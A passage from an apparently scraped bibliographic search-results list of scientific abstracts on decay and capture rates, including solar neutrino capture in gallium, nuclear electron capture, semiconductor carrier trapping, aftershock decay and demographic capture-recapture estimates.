fundamental question of what is the mechanism of the spatial decay of a ground state. 13. Transition in the decay rates of stationary distributions of Lévy motion in an energy landscape Kaleta, Kamil; Lőrinczi, József 2016-02-01 The time evolution of random variables with Lévy statistics has the ability to develop jumps, displaying very different behaviors from continuously fluctuating cases. Such patterns appear in an ever broadening range of examples including random lasers, non-Gaussian kinetics, or foraging strategies. The penalizing or reinforcing effect of the environment, however, has been little explored so far. We report a new phenomenon which manifests as a qualitative transition in the spatial decay behavior of the stationary measure of a jump process under an external potential, occurring on a combined change in the characteristics of the process and the lowest eigenvalue resulting from the effect of the potential. This also provides insight into the fundamental question of what is the mechanism of the spatial decay of a ground state. 14. Measurement of the solar neutrino capture rate with gallium metal. III. Results for the 2002-2007 data-taking period Abdurashitov, J. N.; Gavrin, V. N.; Gorbachev, V. V.; Gurkina, P. P.; Ibragimova, T. V.; Kalikhov, A. V.; Khairnasov, N. G.; Knodel, T. V.; Mirmov, I. N.; Shikhin, A. A.; Veretenkin, E. P.; Yants, V. E.; Zatsepin, G. T.; Bowles, T. J.; Elliott, S. R.; Teasdale, W. A.; Nico, J. S.; Cleveland, B. T.; Wilkerson, J. F. 2009-07-01 The Russian-American experiment SAGE began to measure the solar neutrino capture rate with a target of gallium metal in December 1989. Measurements have continued with only a few brief interruptions since that time. In this article we present the experimental improvements in SAGE since its last published data summary in December 2001. Assuming the solar neutrino production rate was constant during the period of data collection, combined analysis of 168 extractions through December 2007 gives a capture rate of solar neutrinos with energy more than 233 keV of 65.4-3.0+3.1 (stat) -2.8+2.6 (syst) SNU. The weighted average of the results of all three Ga solar neutrino experiments, SAGE, Gallex, and GNO, is now 66.1±3.1 SNU, where statistical and systematic uncertainties have been combined in quadrature. During the recent period of data collection a new test of SAGE was made with a reactor-produced Ar37 neutrino source. The ratio of observed to calculated rates in this experiment, combined with the measured rates in the three prior Cr51 neutrino-source experiments with Ga, is 0.87±0.05. A probable explanation for this low result is that the cross section for neutrino capture by the two lowest-lying excited states in Ge71 has been overestimated. If we assume these cross sections are zero, then the standard solar model including neutrino oscillations predicts a total capture rate in Ga in the range of 63 SNU to 66 SNU with an uncertainty of about 4%, in good agreement with experiment. We derive the current value of the neutrino flux produced in the Sun by the proton-proton fusion reaction to be ϕpp⊙=(6.0±0.8)×1010/(cm2s), which agrees well with the pp flux predicted by the standard solar model. Finally, we make several tests and show that the data are consistent with the assumption that the solar neutrino production rate is constant in time. 15. Measurement of the solar neutrino capture rate with gallium metal. III. Results for the 2002-2007 data-taking period SciTech Connect Abdurashitov, J. N.; Gavrin, V. N.; Gorbachev, V. V.; Gurkina, P. P.; Ibragimova, T. V.; Kalikhov, A. V.; Khairnasov, N. G.; Knodel, T. V.; Mirmov, I. N.; Shikhin, A. A.; Veretenkin, E. P.; Yants, V. E.; Zatsepin, G. T.; Bowles, T. J.; Elliott, S. R.; Teasdale, W. A.; Nico, J. S.; Cleveland, B. T.; Wilkerson, J. F. 2009-07-15 The Russian-American experiment SAGE began to measure the solar neutrino capture rate with a target of gallium metal in December 1989. Measurements have continued with only a few brief interruptions since that time. In this article we present the experimental improvements in SAGE since its last published data summary in December 2001. Assuming the solar neutrino production rate was constant during the period of data collection, combined analysis of 168 extractions through December 2007 gives a capture rate of solar neutrinos with energy more than 233 keV of 65.4{sub -3.0}{sup +3.1} (stat) {sub -2.8}{sup +2.6} (syst) SNU. The weighted average of the results of all three Ga solar neutrino experiments, SAGE, Gallex, and GNO, is now 66.1{+-}3.1 SNU, where statistical and systematic uncertainties have been combined in quadrature. During the recent period of data collection a new test of SAGE was made with a reactor-produced {sup 37}Ar neutrino source. The ratio of observed to calculated rates in this experiment, combined with the measured rates in the three prior {sup 51}Cr neutrino-source experiments with Ga, is 0.87{+-}0.05. A probable explanation for this low result is that the cross section for neutrino capture by the two lowest-lying excited states in {sup 71}Ge has been overestimated. If we assume these cross sections are zero, then the standard solar model including neutrino oscillations predicts a total capture rate in Ga in the range of 63 SNU to 66 SNU with an uncertainty of about 4%, in good agreement with experiment. We derive the current value of the neutrino flux produced in the Sun by the proton-proton fusion reaction to be {phi}{sub pp}{sup {center_dot}}=(6.0{+-}0.8)x10{sup 10}/(cm{sup 2} s), which agrees well with the pp flux predicted by the standard solar model. Finally, we make several tests and show that the data are consistent with the assumption that the solar neutrino production rate is constant in time. 16. Measurement of the radiative and nonradiative decay rates of single CdSe nanocrystals through a controlled modification of their spontaneous emission. PubMed Brokmann, X; Coolen, L; Dahan, M; Hermier, J P 2004-09-03 We present a simple method to measure the radiative and nonradiative recombination rates of individual fluorescent emitters at room temperature. By placing a single molecule successively close and far from a dielectric interface and simultaneously measuring its photoluminescence decay and its orientation, both the radiative and nonradiative recombination rates can be determined. For CdSe nanocrystals, our results demonstrate that the fluorescence quantum efficiency, determined at the single-molecule level, is 98% in average, far above the value expected from conventional ensemble experiments. The bidimensional nature of the transition dipole is also directly evidenced from a single-particle measurement. 17. Injection deep level transient spectroscopy: An improved method for measuring capture rates of hot carriers in semiconductors Fleming, R. M.; Seager, C. H.; Lang, D. V.; Campbell, J. M. 2015-07-01 An improved method for measuring the cross sections for carrier trapping at defects in semiconductors is described. This method, a variation of deep level transient spectroscopy (DLTS) used with bipolar transistors, is applied to hot carrier trapping at vacancy-oxygen, carbon-oxygen, and three charge states of divacancy centers (V2) in n- and p-type silicon. Unlike standard DLTS, we fill traps by injecting carriers into the depletion region of a bipolar transistor diode using a pulse of forward bias current applied to the adjacent diode. We show that this technique is capable of accurately measuring a wide range of capture cross sections at varying electric fields due to the control of the carrier density it provides. Because this technique can be applied to a variety of carrier energy distributions, it should be valuable in modeling the effect of radiation-induced generation-recombination currents in bipolar devices. 18. Injection deep level transient spectroscopy: An improved method for measuring capture rates of hot carriers in semiconductors SciTech Connect Fleming, R. M.; Seager, C. H.; Lang, D. V.; Campbell, J. M. 2015-07-07 An improved method for measuring the cross sections for carrier trapping at defects in semiconductors is described. This method, a variation of deep level transient spectroscopy (DLTS) used with bipolar transistors, is applied to hot carrier trapping at vacancy-oxygen, carbon-oxygen, and three charge states of divacancy centers (V{sub 2}) in n- and p-type silicon. Unlike standard DLTS, we fill traps by injecting carriers into the depletion region of a bipolar transistor diode using a pulse of forward bias current applied to the adjacent diode. We show that this technique is capable of accurately measuring a wide range of capture cross sections at varying electric fields due to the control of the carrier density it provides. Because this technique can be applied to a variety of carrier energy distributions, it should be valuable in modeling the effect of radiation-induced generation-recombination currents in bipolar devices. 19. Injection deep level transient spectroscopy: An improved method for measuring capture rates of hot carriers in semiconductors SciTech Connect Fleming, R. M.; Seager, C. H.; Lang, D. V.; Campbell, J. M. 2015-07-02 In this study, an improved method for measuring the cross sections for carrier trapping at defects in semiconductors is described. This method, a variation of deep level transient spectroscopy(DLTS) used with bipolar transistors, is applied to hot carrier trapping at vacancy-oxygen, carbon-oxygen, and three charge states of divacancy centers (V2) in n- and p-type silicon. Unlike standard DLTS, we fill traps by injecting carriers into the depletion region of a bipolar transistor diode using a pulse of forward bias current applied to the adjacent diode. We show that this technique is capable of accurately measuring a wide range of capture cross sections at varying electric fields due to the control of the carrier density it provides. Because this technique can be applied to a variety of carrier energy distributions, it should be valuable in modeling the effect of radiation-induced generation-recombination currents in bipolar devices. 20. α-decay branching ratios of near-threshold states in 19Ne and the astrophysical rate of 15O(α,γ)19Ne Davids, B.; van den Berg, A. M.; Dendooven, P.; Fleurot, F.; Hunyadi, M.; de Huu, M. A.; Rehm, K. E.; Segel, R. E.; Siemssen, R. H.; Wilschut, H. W.; Wörtche, H. J.; Wuosmaa, A. H. 2003-01-01 The 15O(α,γ)19Ne reaction is one of two routes for breakout from the hot CNO cycles into the rp process in accreting neutron stars. Its astrophysical rate depends critically on the decay properties of excited states in 19Ne lying just above the 15O+α threshold. We have measured the α-decay branching ratios for these states using the p(21Ne,t)19Ne reaction at 43 MeV/nucleon. Combining our measurements with previous determinations of the radiative widths of these states, we conclude that no significant breakout from the hot CNO cycle into the rp process in novas is possible via 15O(α,γ)19Ne, assuming that current models accurately represent their temperature and density conditions. 1. DETERMINING THE RATIO OF THE H+ YIELDS TV TO H+ YIELDS TB DECAY RATES FOR LARGE TAN BETA AT THE LARGE HADRON COLLIDER. SciTech Connect ASSAMAGAN,K.A.GUASCH,J.MORETTI,S.PENARANDA,S. 2003-05-27 We present results on the determination of the observable ratio R = BR(H{sup +} {yields} {tau}{sup +}{nu}{sup -})/BR(H{sup +} {yields} t{bar b}) of charged Higgs boson decay rates as a discriminant quantity between Supersymmetric and non-Supersymmetric models. Simulation of measurements of this quantity through the analysis of the charged Higgs production process gb {yields} tbH{sup +} and relative backgrounds in the two above decay channels has been performed in the context of ATLAS. A {approx} 12-14% accuracy on R can be achieved for tan {beta} = 50, m{sub H{sup {+-}}} = 300-500 GeV and after an integrated luminosity of 300 fb{sup -1}. With this precision measurement, the Large Hadron Collider (LHC) can easily discriminate between models for the two above scenarios, so long as tan {beta} > 20. 2. Regional stressing rate appears to control duration and decay of off-fault aftershocks in the 2011 M=9.0 Tohoku-oki, Japan, earthquake Toda, S.; Stein, R. S. 2013-12-01 The 11 March 2001 M=9.0 Tohoku-oki, Japan, earthquake brought the unprecedented broad increase in seismicity over inland Japan and far offshore. The seismicity rate increase was observed at distances of up to 425 km from the locus of high seismic slip on the megathrust, which roughly corresponds to the areas over 0.1 bar Coulomb stress increase (e.g., Toda et al., 2011). Such stress perturbation in the entire eastern Honshu island gives us a great opportunity to test one of the hypotheses in rate and state friction of Dieterich (1994): aftershock duration (ta) is inversely proportional to fault stressing rate. The Tohoku-oki mainshock indeed started a stopwatch simultaneously for all the off-fault and on-fault aftershocks in various tectonic situations. We have carefully examined the aftershock decays fitting the Omori-Utsu formula in several activated regions, including on the 2011 source fault, several inland areas of Tohoku (Akita, Iwaki, northern Sendai, and Fukushima), Tokyo metropolitan area, Choshi (east of Tokyo), Izu Peninsula, and areas along the most active Itoigawa-Shizuoka Tectonic Line (ISTL) central Honshu. Comparing the regional aftershock decays with the background rates of seismicity estimated from the JMA catalog from 2000 to 2010, we measured ta. One of the extreme short duration was measured at the Izu Peninsula where the heightened seismicity was rapidly toned down to the normal in one month. Overall seismicity in the Tohoku mainshock zone has been mostly closing to normal in 2 - 3 years. Both regions are characterized by high loading rate due to plate collision and subduction. Seismicity beneath Tokyo, also characterized by complex plate interfaces and brought average 1 bar closer to failure, has not followed the simple Omori decay but being settled a new higher rate after a rapid decay. In contrast to these highly deformed regions, current seismicity in slowly loading Tohoku inland regions are still much higher than background rate, which 3. [Estimation on the level of birth and death rates of population in the three gorges area by means of capture-mark-recapture method]. PubMed Zhang, Jing; Mao, De-qiang; He, Yuan-yuan; Yan, Chao-yang; Jiang, Bin; Ning, Gui-jun; Huang, Yu-ying; Wang, Xin-li; Luo, Chao; Shi, Guo-sheng; Chen, Bin; Yang, Wei-zhong 2006-11-01 To evaluate quality of surveillance and emendate rates of birth and death of population of the Three Gorges area. Data on the two samples collected were designed based on principle of capture-recapture method. An investigation of missing report of birth and death was conducted in 7061 families selected through stratified random sampling method. We collected and registered the data of birth and death in every family investigated and checked with correlative records reported in disease surveillance system of the Three Gorges area. The missing report rates and the 95% confidence intervals of birth rate and death rate were calculated. The underreporting rates of birth and death were 13.91% and 15.60% and death of infant was 33.33%. The emended birth rate was 8.92 per thousandth and the 95% confidence interval of birth rate was 8.38 per thousandth-9.45 per thousandth. The emended report rate of death was 6.88 per thousandth and the collectivity 95% confidence interval was 6.37%-7.38 per thousandth. Results showed that the quality of birth and death in the disease surveillance reporting system of Three Gorges area was competent to the quality level of the standard set for national disease surveillance system. The birth and death rates of population in the Three Gorges area were under 10.00 per thousandth. 4. Radiative capture versus Coulomb dissociation. SciTech Connect Esbensen, H.; Physics 2006-01-01 Measurements of the Coulomb dissociation of {sup 8}B have been used to infer the rate of the inverse radiative proton capture on {sup 7}Be. The analysis is usually based on the assumptions that the two processes are related by detailed balance and described by E1 transitions. However, there are corrections to this relation. The Coulomb form factors for the two processes, for example, are not identical. There are also E2 transitions and higher-order effects in the Coulomb dissociation, and the nuclear induced breakup cannot always be ignored. While adding first-order E2 transitions enhances the decay energy spectrum, the other mechanisms cause a suppression at low relative energies. The net result may accidentally be close to the conventional first-order E1 calculation, but there are differences which cannot be ignored if accuracies of 10% or better are needed. 5. Is decay constant? PubMed Pommé, S; Stroh, H; Altzitzoglou, T; Paepen, J; Van Ammel, R; Kossert, K; Nähle, O; Keightley, J D; Ferreira, K M; Verheyen, L; Bruggeman, M 2017-09-07 6. An all-aqueous route to polymer brush-modified membranes with remarkable permeabilites and protein capture rates PubMed Central Anuraj, Nishotha; Bhattacharjee, Somnath; Geiger, James H.; Baker, Gregory L.; Bruening, Merlin L. 2011-01-01 Microporous membranes are attractive for protein purification because convection rapidly brings proteins to binding sites. However, the low binding capacity of such membranes limits their applications. This work reports a rapid, aqueous procedure to create highly permeable, polymer brush-modified membranes that bind large amounts of protein. The synthetic method includes a 10-min adsorption of a macroinitiator in a hydroxylated nylon membrane and a subsequent 5-min aqueous atom transfer radical polymerization of 2-(methacryloyloxy)ethyl succinate from the immobilized initiator to form poly(acid) brushes. This procedure likely leads to more swollen, less dense brushes than polymerization from silane initiators, and thus requires less polymer to achieve the same binding capacity. The hydraulic permeability of the poly(acid) membranes is 4-fold higher than that of similar membranes prepared by growing brushes from immobilized silane initiators. These brush-containing nylon membranes bind 120 mg/cm3 of lysozyme using solution residence times as short as 35 ms, and when functionalized with nitrilotriacetate (NTA)-Ni2+ complexes, they capture 85 mg/cm3 of histidine6-tagged (His-tagged) Ubiquitin. Additionally the NTA-Ni2+-functionalized membranes isolate His-tagged myo-inositol-1-phosphate synthase directly from cell extracts and show >90% recovery of His-tagged proteins. PMID:22287817 7. Effect of release rate and ratio of (Z)-11-hexadecen-1-ol from synthetic pheromone blends on trap capture ofHeliothis subflexa (Lepidoptera: Noctuidae). PubMed Heath, R R; Mitchell, E R; Cibrian Tovar, J 1990-04-01 8. Symmetry relations in nucleon decay Hurlbert, Anya; Wilczek, Frank 1980-05-01 Some experimental consequences of the structure of the effective hamiltonian for nucleon decay are presented. New results concern relations among inclusive decay rates, a striking test of the kinship hypothesis involving μ+ polarization, and soft π theorems. 9. Do numerical rating scales and the Roland-Morris Disability Questionnaire capture changes that are meaningful to patients with persistent back pain? PubMed Hush, Julia M; Refshauge, Kathryn M; Sullivan, Gerard; De Souza, Lorraine; McAuley, James H 2010-07-01 To investigate patients' views about two common outcome measures used for back pain: Numerical Rating Scales for pain and the Roland-Morris Disability Questionnaire. Thirty-six working adults who had previously sought primary care for back pain and who could speak and read English. Eight focus groups were conducted to explore participants' views about the 11-point Numerical Rating Scales and the 24-item Roland-Morris Disability Questionnaire. Each group was led by a facilitator and an interview topic guide was used. Audio recordings of focus groups were transcribed verbatim. Framework analysis was used to chart participants' views and an interpretive analysis performed to explain the findings. Participants reported that neither the Roland-Morris nor the Numerical Rating Scales captured the complex personal experience of pain or relevant changes in their condition. The time-frame of assessment was identified as particularly problematic and the Roland-Morris did not capture relevant functional domains. This study provides empirical data that working adults with persistent back pain consider these clinical outcome measures largely inadequate. These measures currently used for back pain may contribute to misleading conclusions about treatment efficacy and patient recovery. 10. Capsule endoscopy capture rate: Has 4 frames-per-second any impact over 2 frames-per-second? PubMed Central Fernandez-Urien, Ignacio; Carretero, Cristina; Borobio, Erika; Borda, Ana; Estevez, Emilio; Galter, Sara; Gonzalez-Suarez, Begoña; Gonzalez, Benito; Lujan, Marisol; Martinez, Jose Luis; Martínez, Vanessa; Menchén, Pedro; Navajas, Javier; Pons, Vicente; Prieto, Cesar; Valle, Julio 2014-01-01 AIM: To compare the current capsule and a new prototype at 2 and 4 frames-per-second, respectively, in terms of clinical and therapeutic impact. METHODS: One hundred patients with an indication for capsule endoscopy were included in the study. All procedures were performed with the new device (SB24). After an exhaustive evaluation of the SB24 videos, they were then converted to “SB2-like” videos for their evaluation. Findings, frames per finding, and clinical and therapeutic impact derived from video visualization were analyzed. Kappa index for interobserver agreement and χ2 and Student’s t tests for qualitative/quantitative variables, respectively, were used. Values of P under 0.05 were considered statistically significant. RESULTS: Eighty-nine out of 100 cases included in the study were ultimately included in the analysis. The SB24 videos detected the anatomical landmarks (Z-line and duodenal papilla) and lesions in more patients than the “SB2-like” videos. On the other hand, the SB24 videos detected more frames per landmark/lesion than the “SB2-like” videos. However, these differences were not statistically significant (P > 0.05). Both clinical and therapeutic impacts were similar between SB24 and “SB2-like” videos (K = 0.954). The time spent by readers was significantly higher for SB24 videos visualization (P < 0.05) than for “SB2-like” videos when all images captured by the capsule were considered. However, these differences become non-significant if we only take into account small bowel images (P > 0.05). CONCLUSION: More frames-per-second detect more landmarks, lesions, and frames per landmark/lesion, but is time consuming and has a very low impact on clinical and therapeutic management. PMID:25339834 11. Bivariate distributions in statistical spectroscopy studies: IV. Interacting particle Gamow-Teller strength densities and β-decay rates of fp-shell nuclei for presupernova stars Kota, V. K. B.; Majumdar, D. 1995-12-01 A method to calculate temperature dependent β-decay rates is developed by writing the expression for the rates explicitly in terms of bivariate GT strength densities ( I {/O H } ( GT)) for a given hamiltonian H=h+V and state densities of the parent nucleus besides having the usual phase space factors. The theory developed in the preceding paper (III) for constructing NIP strength densities is applied for generating I {/O h } ( GT) and then I {/O H } ( GT) is constructed using the bivariate convolution form I {/O H } ( GT)=Σ S I {/O(GT) h,S }⊗ρ{/O(GT) V, S }; BIV-G . The spreading bivariate Gaussian ρ{/O(GT) V}; BIV-G, for fp-shell nuclei, is constructed by assuming that the marginal centroids are zero, the marginal variances are same as the corresponding state density variances and fixing the bivariate correlation coefficientbar ζ using experimental β-decay half lifes. With the deduced values ofbar ζ bar ζ ˜ 0.67, β-S-decay rates for61,62Fe and62 64Co isotopes are calculated at presupernova matter densities ρ=107 109 gm/cc, temperatures T=(3 5)×109 ∘K and electron fractions Ye=0.43 0.5. The convolution form for I {O(GT)/ H } led to a simple expression for calculating GT non-energy weighted sum rule strength and it describes (within 10%) the shell model results of fp-shell nuclei. 12. A method to characterize in vivo tendon force-strain relationship by combining ultrasonography, motion capture and loading rates. PubMed Gerus, Pauline; Rao, Guillaume; Berton, Eric 2011-08-11 The ultrasonography contributes to investigate in vivo tendon force-strain relationship during isometric contraction. In previous studies, different methods are available to estimate the tendon strain, using different loading rates and models to fit the tendon force-strain relationship. This study was aimed to propose a standard method to characterize the in vivo tendon force-strain relationship. We investigated the influence on the force-strain relationship for medialis gastrocnemius (MG) of (1) one method which takes into account probe and joint movements to estimate the instantaneous tendon length, (2) models used to fit the force-strain relationship for uniaxial test (polynomial vs. Ogden), and (3) the loading rate on tendon strain. Subjects performed ramp-up contraction during isometric contractions at two different target speeds: 1.5s and minimal time with ultrasound probe fixed over the muscle-tendon junction of the MG muscle. The used method requires three markers on ultrasound probe and a marker on calcaneum to take into account all movements, and was compared to the strain estimated using ultrasound images only. The method using ultrasound image only overestimated the tendon strain from 40% of maximal force. The polynomial model showed similar fitting results than the Ogden model (R²=0.98). A loading rate effect was found on tendon strain, showing a higher strain when loading rate decreases. The characterization of tendon force-strain relationship needs to be standardized by taking into account all movements to estimate tendon strain and controlling the loading rate. The polynomial model appears to be appropriate to represent the tendon force-strain relationship. 13. Carcass enrichment does not alter decay rates or arthropod community structure: a test of the arthropod saturation hypothesis at the anthropology research facility in Knoxville, Tennessee. PubMed Shahid, S Adam; Schoenly, Kenneth; Haskell, Neal H; Hall, Robert D; Zhang, Wenjun 2003-07-01 In a test of an arthropod saturation hypothesis, we asked if the 30-yr history of carcass enrichment at the Anthropology Research Facility, Knoxville TN, has altered carcass decay rates or community structure of sarcosaprophagous arthropods, compared with three local nonenriched sites. Over a 12-d period in 1998, using pitfall traps and sweep nets, we sampled a total of 81,000 invertebrates from freshly euthanized pigs (Sus scrofa L.) placed in these sites. From this number, we sorted 69,286 forensically important (sarcosaprophagous) arthropods. The community structure of these organisms, as measured by species and individuals accumulation curves, rarefaction, and nonparametric correlation, was comparable in all four sites in taxonomic similarity, colonization rates, aerial species richness, and ranked abundances of forensically important taxa on a per carcass basis. Measures of carcass decay rate, remaining carcass weight (%) and periodic weight loss, also were similar. In most cases, carcass surface temperatures and maggot mass temperatures were also statistically indistinguishable. Probability-based results and posthoc power analyses of these variables led us to conclude that the sarcosaprophagous arthropod community of the Anthropology Research Facility is representative of surrounding sites. 14. Theory of nuclear excitation by electron capture for heavy ions Pálffy, Adriana; Scheid, Werner; Harman, Zoltán 2006-01-01 We investigate the resonant process of nuclear excitation by electron capture (NEEC), in which a continuum electron is captured into a bound state of an ion with the simultaneous excitation of the nucleus. In order to derive the cross section a Feshbach projection operator formalism is introduced. Nuclear states and transitions are described by a nuclear collective model and making use of experimental data. Transition rates and total cross sections for NEEC followed by the radiative decay of the excited nucleus are calculated for various heavy-ion collision systems. 15. Comparative study of Gamow-Teller strength distributions in the odd-odd nucleus {sup 50}V and its impact on electron capture rates in astrophysical environments SciTech Connect 2007-11-15 Gamow-Teller (GT) strength transitions are an ideal probe for testing nuclear structure models. In addition to nuclear structure, GT transitions in nuclei directly affect the early phases of Type Ia and Type-II supernovae core collapse since the electron capture rates are partly determined by these GT transitions. In astrophysics, GT transitions provide an important input for model calculations and element formation during the explosive phase of a massive star at the end of its life-time. Recent nucleosynthesis calculations show that odd-odd and odd-A nuclei cause the largest contribution in the rate of change of lepton-to-baryon ratio. In the present manuscript, we have calculated the GT strength distributions and electron capture rates for odd-odd nucleus {sup 50}V by using the pn-QRPA theory. At present {sup 50}V is the first experimentally available odd-odd nucleus in fp-shell nuclei. We also compare our GT strength distribution with the recently measured results of a {sup 50}V(d, {sup 2}He){sup 50}Ti experiment, with the earlier work of Fuller, Fowler, and Newman (referred to as FFN) and subsequently with the large-scale shell model calculations. One curious finding of the paper is that the Brink's hypothesis, usually employed in large-scale shell model calculations, is not a good approximation to use at least in the case of {sup 50}V. SNe Ia model calculations performed using FFN rates result in overproduction of {sup 50}Ti, and were brought to a much acceptable value by employing shell model results. It might be interesting to study how the composition of the ejecta using presently reported QRPA rates compare with the observed abundances. 16. Comparative study of Gamow-Teller strength distributions in the odd-odd nucleus V50 and its impact on electron capture rates in astrophysical environments 2007-11-01 Gamow-Teller (GT) strength transitions are an ideal probe for testing nuclear structure models. In addition to nuclear structure, GT transitions in nuclei directly affect the early phases of Type Ia and Type-II supernovae core collapse since the electron capture rates are partly determined by these GT transitions. In astrophysics, GT transitions provide an important input for model calculations and element formation during the explosive phase of a massive star at the end of its life-time. Recent nucleosynthesis calculations show that odd-odd and odd-A nuclei cause the largest contribution in the rate of change of lepton-to-baryon ratio. In the present manuscript, we have calculated the GT strength distributions and electron capture rates for odd-odd nucleus V50 by using the pn-QRPA theory. At present V50 is the first experimentally available odd-odd nucleus in fp-shell nuclei. We also compare our GT strength distribution with the recently measured results of a V50(d, He2)Ti50 experiment, with the earlier work of Fuller, Fowler, and Newman (referred to as FFN) and subsequently with the large-scale shell model calculations. One curious finding of the paper is that the Brink's hypothesis, usually employed in large-scale shell model calculations, is not a good approximation to use at least in the case of V50. SNe Ia model calculations performed using FFN rates result in overproduction of Ti50, and were brought to a much acceptable value by employing shell model results. It might be interesting to study how the composition of the ejecta using presently reported QRPA rates compare with the observed abundances. 17. Measurement of branching fractions and rate asymmetries in the rare decays B→K(*)l⁺l⁻ SciTech Connect Lees, J. P.; Poireau, V.; Tisserand, V.; Garra Tico, J.; Grauges, E.; Palano, A.; Eigen, G.; Stugu, B.; Brown, D. N.; Kerth, L. T.; Kolomensky, Yu. G.; Lynch, G.; Koch, H.; Schroeder, T.; Asgeirsson, D. J.; Hearty, C.; Mattison, T. S.; McKenna, J. A.; Khan, A.; Blinov, V. E.; Buzykaev, A. R.; Druzhinin, V. P.; Golubev, V. B.; Kravchenko, E. A.; Onuchin, A. P.; Serednyakov, S. I.; Skovpen, Yu. I.; Solodov, E. P.; Todyshev, K. Yu.; Yushkov, A. N.; Bondioli, M.; Kirkby, D.; Lankford, A. J.; Mandelkern, M.; Atmacan, H.; Gary, J. W.; Liu, F.; Long, O.; Vitug, G. M.; Campagnari, C.; Hong, T. M.; Kovalskyi, D.; Richman, J. D.; West, C. A.; Eisner, A. M.; Kroseberg, J.; Lockman, W. S.; Martinez, A. J.; Schumm, B. A.; Seiden, A.; Chao, D. S.; Cheng, C. H.; Echenard, B.; Flood, K. T.; Hitlin, D. G.; Ongmongkolkul, P.; Porter, F. C.; Rakitin, A. Y.; Andreassen, R.; Huard, Z.; Meadows, B. T.; Sokoloff, M. D.; Sun, L.; Bloom, P. C.; Ford, W. T.; Gaz, A.; Nauenberg, U.; Smith, J. G.; Wagner, S. R.; Ayad, R.; Toki, W. H.; Spaan, B.; Schubert, K. R.; Schwierz, R.; Bernard, D.; Verderi, M.; Clark, P. J.; Playfer, S.; Bettoni, D.; Bozzi, C.; Calabrese, R.; Cibinetto, G.; Fioravanti, E.; Garzia, I.; Luppi, E.; Munerato, M.; Negrini, M.; Piemontese, L.; Santoro, V.; Baldini-Ferroli, R.; Calcaterra, A.; de Sangro, R.; Finocchiaro, G.; Patteri, P.; Peruzzi, I. M.; Piccolo, M.; Rama, M.; Zallo, A.; Contri, R.; Guido, E.; Lo Vetere, M.; Monge, M. R.; Passaggio, S.; Patrignani, C.; Robutti, E.; Bhuyan, B.; Prasad, V.; Lee, C. L.; Morii, M.; Edwards, A. J.; Adametz, A.; Uwer, U.; Lacker, H. M.; Lueck, T.; Dauncey, P. D.; Behera, P. K.; Mallik, U.; Chen, C.; Cochran, J.; Meyer, W. T.; Prell, S.; Rubin, A. E.; Gritsan, A. V.; Guo, Z. J.; Arnaud, N.; Davier, M.; Derkach, D.; Grosdidier, G.; Le Diberder, F.; Lutz, A. M.; Malaescu, B.; Roudeau, P.; Schune, M. H.; Stocchi, A.; Wormser, G.; Lange, D. J.; Wright, D. M.; Chavez, C. A.; Coleman, J. P.; Fry, J. R.; Gabathuler, E.; Hutchcroft, D. E.; Payne, D. J.; Touramanis, C.; Bevan, A. J.; Di Lodovico, F.; Sacco, R.; Sigamani, M.; Cowan, G.; Brown, D. N.; Davis, C. L.; Denig, A. G.; Fritsch, M.; Gradl, W.; Griessinger, K.; Hafner, A.; Prencipe, E.; Barlow, R. J.; Jackson, G.; Lafferty, G. D.; Behn, E.; Cenci, R.; Hamilton, B.; Jawahery, A.; Roberts, D. A.; Dallapiccola, C.; Cowan, R.; Dujmic, D.; Sciolla, G.; Cheaib, R.; Lindemann, D.; Patel, P. M.; Robertson, S. H.; Biassoni, P.; Neri, N.; Palombo, F.; Stracka, S.; Cremaldi, L.; Godang, R.; Kroeger, R.; Sonnek, P.; Summers, D. J.; Nguyen, X.; Simard, M.; Taras, P.; De Nardo, G.; Monorchio, D.; Onorato, G.; Sciacca, C.; Martinelli, M.; Raven, G.; Jessop, C. P.; LoSecco, J. M.; Wang, W. F.; Honscheid, K.; Kass, R.; Brau, J.; Frey, R.; Sinev, N. B.; Strom, D.; Torrence, E.; Feltresi, E.; Gagliardi, N.; Margoni, M.; Morandin, M.; Posocco, M.; Rotondo, M.; Simi, G.; Simonetto, F.; Stroili, R.; Akar, S.; Ben-Haim, E.; Bomben, M.; Bonneaud, G. R.; Briand, H.; Calderini, G.; Chauveau, J.; Hamon, O.; Leruste, Ph.; Marchiori, G.; Ocariz, J.; Sitt, S.; Biasini, M.; Manoni, E.; Pacetti, S.; Rossi, A.; Angelini, C.; Batignani, G.; Bettarini, S.; Carpinelli, M.; Casarosa, G.; Cervelli, A.; Forti, F.; Giorgi, M. A.; Lusiani, A.; Oberhof, B.; Paoloni, E.; Perez, A.; Rizzo, G.; Walsh, J. J.; Lopes Pegna, D.; Olsen, J.; Smith, A. J. S.; Telnov, A. V.; Anulli, F.; Faccini, R.; Ferrarotto, F.; Ferroni, F.; Gaspero, M.; Li Gioi, L.; Mazzoni, M. A.; Piredda, G.; Bünger, C.; Grünberg, O.; Hartmann, T.; Leddig, T.; Schröder, H.; Voss, C.; Waldi, R.; Adye, T.; Olaiya, E. O.; Wilson, F. F.; Emery, S.; Hamel de Monchenault, G.; Vasseur, G.; Yèche, Ch.; Aston, D.; Bard, D. J.; Bartoldus, R.; Benitez, J. F.; Cartaro, C.; Convery, M. R.; Dorfan, J.; Dubois-Felsmann, G. P.; Dunwoodie, W.; Ebert, M.; Field, R. C.; Franco Sevilla, M.; Fulsom, B. G.; Gabareen, A. M.; Graham, M. T.; Grenier, P.; Hast, C.; Innes, W. R.; Kelsey, M. H.; Kim, P.; Kocian, M. L.; Leith, D. W. G. S.; Lewis, P.; Lindquist, B.; Luitz, S.; Luth, V.; Lynch, H. L.; MacFarlane, D. B.; Muller, D. R.; Neal, H.; Nelson, S.; Perl, M.; Pulliam, T.; Ratcliff, B. N.; Roodman, A.; Salnikov, A. A.; Schindler, R. H.; Snyder, A.; Su, D.; Sullivan, M. K.; Va’vra, J.; Wagner, A. P.; Wisniewski, W. J.; Wittgen, M.; Wright, D. H.; Wulsin, H. W.; Young, C. C.; Ziegler, V.; Park, W.; Purohit, M. V.; White, R. M.; Wilson, J. R.; Randle-Conde, A.; Sekula, S. J.; Bellis, M.; Burchat, P. R.; Miyashita, T. S.; Alam, M. S.; Ernst, J. A.; Gorodeisky, R.; Guttman, N.; Peimer, D. R.; Soffer, A.; Lund, P.; Spanier, S. M.; Ritchie, J. L.; Ruland, A. M.; Schwitters, R. F.; Wray, B. C.; Izen, J. M.; Lou, X. C.; Bianchi, F.; Gamba, D.; Lanceri, L.; Vitale, L.; Martinez-Vidal, F.; Oyanguren, A.; Ahmed, H.; Albert, J.; Banerjee, Sw.; Bernlochner, F. U.; Choi, H. H. F.; King, G. J.; Kowalewski, R.; Lewczuk, M. J.; Nugent, I. M.; Roney, J. 